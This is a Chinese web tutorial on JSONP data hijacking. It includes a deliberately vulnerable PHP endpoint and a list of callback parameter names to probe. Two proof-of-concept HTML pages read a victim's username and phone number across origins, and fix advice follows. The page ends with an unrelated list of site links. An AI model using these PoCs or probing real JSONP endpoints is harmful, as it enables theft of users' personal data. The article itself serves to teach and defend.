位置: IT常识 - 正文

JSONP数据劫持漏洞(json解析漏洞)

编辑:rootadmin
JSONP数据劫持漏洞 ​介绍

推荐整理分享JSONP数据劫持漏洞(json解析漏洞),希望有所帮助,仅作参考,欢迎阅读内容。

文章相关热门搜索词:json劫持漏洞验证方法,json数据解析错误是什么意思,json数据解析错误是什么意思,jsonp漏洞利用,json loads dumps,jsonp漏洞利用,json劫持漏洞验证方法,json劫持怎么防止,内容如对您有帮助,希望把文章链接给更多的朋友!

JSONP(JSON with Padding)是 json 的一种"使用模式",可以让网页从别的域名(网站)那获取资料,即跨域读取数据;它利用的是script标签的 src 属性不受同源策略影响的特性,使网页可以得到从其他来源动态产生的 json 数据,因此可以用来实现跨域读取数据。

更通俗的说法:JSONP 就是利用 <script> 标签的跨域能力实现跨域数据的访问,请求动态生成的 JavaScript 脚本同时带一个 callback 函数名作为参数。服务端收到请求后,动态生成脚本产生数据,并在代码中以产生的数据为参数调用 callback 函数。

漏洞原理

和 CSRF 类似,都需要用户交互,而 CSRF 主要是以用户的账户进行增删改的操作,jsonp 则主要用来劫持数据。

当网站通过 JSONP 方式传递用户敏感信息时,攻击者可以伪造 JSONP 调用页面,诱导被攻击者访问来达到窃取用户信息的目的;jsonp 数据劫持就是攻击者获取了本应该传给网站其他接口的数据。

漏洞代码

假设这是目标网站上的代码,然后我们利用漏洞就可以劫持到里面的数据,如username、phone

<?php//test.phpheader('Content-type: application/json');$callback = $_GET['callback'];print $callback.'({"username" : "d4m1ts","phone" : "13888888888"});';?>

快速启动 php 环境

php -S 127.0.0.1:9999 实现效果

利用场景

如上图,所有包含有callback等回调函数的,且请求方式为 GET,没有验证 referer 等,都可以尝试下该漏洞

如果返回内容是 json 格式的,但是没有回调函数,我们可以尝试手动添加回调函数去试试运气,一些常见的如下:

_callback=mstkey_cb=mstkeycallback=mstkeycb=mstkeyjsonp=mstkeyjsonpcallback=mstkeyjsonpcb=mstkeyjsonp_cb=mstkeyjson=mstkeyjsoncallback=mstkeyjcb=mstkeycall=mstkeycallBack=mstkeyjsonpCallback=mstkeyjsonpCb=mstkeyjsonp_Cb=mstkeyjsonCallback=mstkeyca=mstkey漏洞利用

当我们发现信息泄露的 jsonp 接口以后,我们需要构造一个恶意 html 页面,然后引诱受害者去访问这个网站,一旦访问了这个网站,脚本就会自动运行,就会向这个接口请求用户的敏感数据,并传送到攻击者的服务器上。

POC基于实现回调函数<script>function xxx(data){ alert(data.username);}</script><script src="http://127.0.0.1:9999/test.php?callback=xxx"></script>JSONP数据劫持漏洞(json解析漏洞)

保存为 html,诱导受害者访问,可见成功获取到了username信息

image-20220322171224615

简而言之:存在信息泄漏的 JSONP 接口http://127.0.0.1:9999/test.php?callback=xxx,攻击者构造 POC 后诱导用户访问 POC,然后就会调用这个接口获取到敏感数据,获取到的敏感数据被攻击者截获了。

另一个 POC基于 jquery<script src="http://cdn.static.runoob.com/libs/jquery/1.8.3/jquery.js"></script><script type="text/javascript"> $.getJSON("http://127.0.0.1:9999/test.php?callback=?", function(data){ alert(data.phone); });</script>

image-20220322173916125

修复建议

扩展

修复建议

接受请求时检查referer来源;

在请求中添加token并在后端进行验证;

严格过滤 callback 函数名及 JSON 里数据的输出。

扩展

如果目标的 header 头没有设置Content-Type为json,而是html,那么也可以造成 XSS 漏洞

一个获取 QQ 号的 JSONP 劫持实例[1]

image-20220322185037473

推荐阅读:JSONP 挖掘与高级利用[2]

参考资料

[1]一个获取 QQ 号的 JSONP 劫持实例: http://www.piaoyi.org/network/get-qq-haoma-js.html

[2]JSONP 挖掘与高级利用: http://drops.xmd5.com/static/drops/papers-6630.html

本文链接地址:https://www.jiuchutong.com/zhishi/299576.html 转载请保留说明!

上一篇:单目测距原理与实现(代码可运行)(单目测距精度)

下一篇:强化学习——Q-Learning算法原理

  • 农业免税收入怎么填纳税申报表
  • 适用综合所得税率表
  • 计提个人所得税计入什么科目
  • 税盘维护费抵扣
  • 小微企业所得税税率2.5% 10% 25%
  • 个人所得税申报操作流程
  • 一税两费可以从费用中扣除吗
  • 季度不超过30万是含税还是不含税
  • 小企业会计准则是小规模纳税人吗
  • 小企业销售商品因批量原因给予客户的商业折扣
  • 物业公司收取供热管道内网的维护费用合理吗
  • 业务分成方案
  • 银行定期存款取钱需要本人吗
  • 一般纳税人旅游服务差额征税税率
  • 关于设备安装调试的说法
  • 该期已经申报此税种且数据已提交,不能预约扣款
  • 企业股权设计咨询这个行业怎么样
  • 开具的红字发票金税三期怎么报税?
  • 小规模农产品可以抵扣吗
  • 卫生防疫站调拨是什么意思
  • 支付给个人的小票怎么写
  • 房地产车位收入做账
  • 如何把操作系统转移到固态硬盘
  • 公司的实收资本是借款,但是利息由公司付,会计怎么做账
  • 怎么通过mac地址访问设备
  • onekey.exe是什么
  • 公积金托收怎么变更
  • PHP:curl_error()的用法_cURL函数
  • 本期进项税额转出会计分录
  • 履约保证金和质保金可以一起收取吗
  • 会计分录的表现形式有
  • php数据库连接池 实例
  • cqi映射表
  • php获取路径和目录的方法
  • 个体户怎么开发票免税
  • 收到预付货款下月交货会计分录
  • vue3.0优点
  • phppdo连接数据库
  • 销售多余材料的收入属于收入吗
  • thinkphp如何做微服务
  • php读取xml接口数据
  • vue大型项目撑得住吗
  • 制造业属不属于第二产业
  • 公司基本户被冻结,其它账户也会被冻吗?
  • mongo mysql区别
  • 收到赔偿金怎么写收据?
  • 清包工一般计税如何开票
  • 三代手续费操作流程
  • 会计人员信息采集怎么填
  • 年报资金数额是什么意思
  • SQL查询数据库中表的某一列
  • 地方水利建设基金减免政策2023
  • 医院哪些地方需要有明显的禁烟标识
  • 应付职工薪酬多计提了如何冲掉
  • 融资租赁固定资产不属于筹资活动
  • 递延收益与递延负债的区别
  • 出售在建工程的会计分录怎么做
  • 所得税费用结转分录
  • 外购材料用于建筑工程会计分录
  • 省外出差
  • 购买超市购物卡有优惠吗
  • 公司房屋租赁协议
  • sqlserver 中文字符集
  • win7怎么更改音频输出
  • windows2003硬盘分区
  • 苹果mac录制屏幕
  • win8系统出现蓝屏怎样处理
  • win10如何打开管理
  • ubuntu虚拟机怎么用
  • centos直接进入命令行
  • 文件在移动或复制过程中权限的变化
  • windows7如何调节屏幕色彩
  • linux查内存信息
  • 二分法查找 js
  • input的file
  • js如何打印服务器图片
  • 不用javascript可以吗
  • js easyui
  • 摩托车车船税怎么收费标准
  • 商丘银行几点上班
  • 免责声明:网站部分图片文字素材来源于网络,如有侵权,请及时告知,我们会第一时间删除,谢谢! 邮箱:opceo@qq.com

    鄂ICP备2023003026号

    网站地图: 企业信息 工商信息 财税知识 网络常识 编程技术

    友情链接: 武汉网站建设